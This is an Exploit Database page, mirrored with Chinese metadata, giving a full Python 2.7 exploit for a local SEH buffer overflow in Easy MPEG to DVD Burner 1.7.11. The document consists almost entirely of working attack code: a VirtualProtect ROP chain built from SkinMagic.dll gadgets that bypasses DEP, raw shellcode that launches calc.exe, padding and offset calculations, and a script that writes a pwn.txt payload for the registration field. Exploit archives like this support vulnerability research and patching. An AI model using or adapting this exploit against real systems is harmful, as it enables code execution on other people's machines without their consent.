Easy MPEG to DVD Burner 1.7.11 – Buffer Overflow (SEH + DEP)

• Exploit Database
• 129 阅读

• 作者： Bailey Belisario
  日期： 2020-04-17
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48339/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151

  # Exploit Title: Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP) # Date: 2020-04-15 # Exploit Author: Bailey Belisario # Tested On: Windows 7 Ultimate x64 # Software Link: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe # Version: 1.7.11 # Exploit Length: 1015 Bytes # Steps : Open application > Register > In Username field paste content of pwn.txt file (Note open this in sublime or vscode)   # Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass using VirtualProtect() on Local Buffer Overflow # Exploit used with Python2.7 #------------------------------------------------------------------------------------------------------------------------------------# # Bad Characters: \x00\x0a\x0d# # SEH Offset: 1012 # # Modules Used: SkinMagic.dll & Easy MPEG to DVD Burner.exe # #------------------------------------------------------------------------------------------------------------------------------------#   # Register setup for VirtualProtect() (Bypass DEP) : #--------------------------------------------------- # EAX = Points to PUSHAD at time VirtualProtect() is called # ECX = lpflOldProtect (0x10047d30 as writable location) # EDX = flNewProtect(0x40) # EBX = dwSize (0x92) # ESP = lpAddress (automatic) # EBP = ReturnTo (ptr to jmp esp) # ESI = ptr to VirtualProtect() # EDI = ROP NOP (RETN)   import struct   def create_rop_chain():   rop_gadgets = [   # Put 1 in EDX and decrement to 0 0x10031752,# XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN 0x1003629a,# ADD EAX,4 # DEC EDX # JNE SKINMAGIC!SETSKINMENU+0X2F505 (10036295) # POP ESI # RETN 0x11111111,# Filler   # Pop the pointer of VirtualProtect into EAX 0x10037b12,# POP EAX # RETN 0x1003b268,# ptr to &VirtualProtect() [IAT SkinMagic.dll]   # Dereference Pointer into EDX then move back to EAX 0x1001c011,# ADD EDX,DWORD PTR [EAX] # RETN 0x0C 0x10031772,# MOV EAX,EDX # RETN 0x11111111,# Filler 0x11111111,# Filler 0x11111111,# Filler   # Push VP and pop into EBP 0x1002e17b,# PUSH EAX # PUSH ESP # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x0C 0x10037b12,# POP EAX # RETN 0x11111111,# Filler 0x11111111,# Filler 0x11111111,# Filler   # Use this to get to address needed to Pop VP into ESI 0x1003619e,# POP EAX # POP ESI # RETN   # Move VP to +12 on stack then push the POP POP RETN 0x10032485,# MOV DWORD PTR [ESP+0CH],EBP # LEA EBP,DWORD PTR DS:[ESP+0CH] # PUSH EAX # RETN 0x11111111,# Filler popped 0x11111111,# Filler popped   # Set ESI to VP 0x1002e1ce,# POP ESI # RETN [SkinMagic.dll] 0x11111111,# Where VP is MOV into   # Set EBP with POP EBP RETN 0x1002894f,# POP EBP # RETN [SkinMagic.dll] 0x1002894f,# skip 4 bytes [SkinMagic.dll]   # Set EDX (# s -d 0x10000000 L?0x10050000 0000003f <- used to find 3F) # Clear out EDX, set it to 0x01, find address where DWORD of EAX will be 0x3F, then add to EDX to be 0x40 0x10031752,# XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN 0x10037b12,# POP EAX # RETN 0x1005a0a0,# Address of 3F 0x10026173,# ADD EDX,DWORD PTR [EAX] # RETN   # Set EBX to 0x92 assuming EBX is 0, but could work with a decent range of numbers # Note: This should be at least length of shellcode 0x100362c6,# XOR EAX,EAX # RETN 0x10033fb2,# ADD AL,0C9 # RETN 0x10033fb2,# ADD AL,0C9 # RETN 0x10035c12,# ADC BL,AL # OR CL,CL # JNE SKINMAGIC!SETSKINMENU+0X2EEDB (10035C6B) # RETN # Set ECX to writable location 0x1003603f,# POP ECX # RETN [SkinMagic.dll] 0x10047d30,# &Writable location [SkinMagic.dll]   # Set EDI to ROP NOP 0x100395c2,# POP EDI # RETN [SkinMagic.dll] 0x10032982,# RETN (ROP NOP) [SkinMagic.dll]   # Do PUSHAD and be 1337 0x10037654,# POP EAX # RETN 0xa140acd2,# CONSTANT 0x100317c8,# ADD EAX,5EFFC883 # RETN 0x1003248d,# PUSH EAX # RETN   # Used to jump to ESP 0x1001cc57,# ptr to 'push esp # ret ' [SkinMagic.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets)   ropChain = create_rop_chain()   # CALC.EXE for POC shell = ("\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72" "\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F" "\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24" "\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45" "\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7")   # 148 Bytes needed to return to ROP CHAIN paddingBeginning = "B"*148   # NOP Sled needs to be sufficient length, from some math, I came out with a buffer of 444 - len(ROP CHAIN) nopLen = 444 - len(ropChain) nopSled = '\x90'*nopLen   # Padding to SEH needs to consider the 420 bytes remaining - shellcode paddingMiddleLen = 420 - len(shell) paddingMiddle = 'B'*paddingMiddleLen   # 0x004043ee (add esp, 7D4) Stack Pivot 2004 bytes # This brings total bytes to SEH Offset (1012) + 3 for a total of 1015 bytes seh = "\xee\x43\x40"   # Exploit Visualization# #------------------------# #BBBBBBBBBBBBBBBBBBBB# #------------------------# # ROP CHAIN# #------------------------# #NOPS# #------------------------# # SHELL CODE # #------------------------# #BBBBBBBBBBBBBBBBBBBB# #------------------------# #SEH # #------------------------#   exploit = paddingBeginning + ropChain + nopSled + shell + paddingMiddle + seh   file = open("pwn.txt", 'w') file.write(exploit) file.close()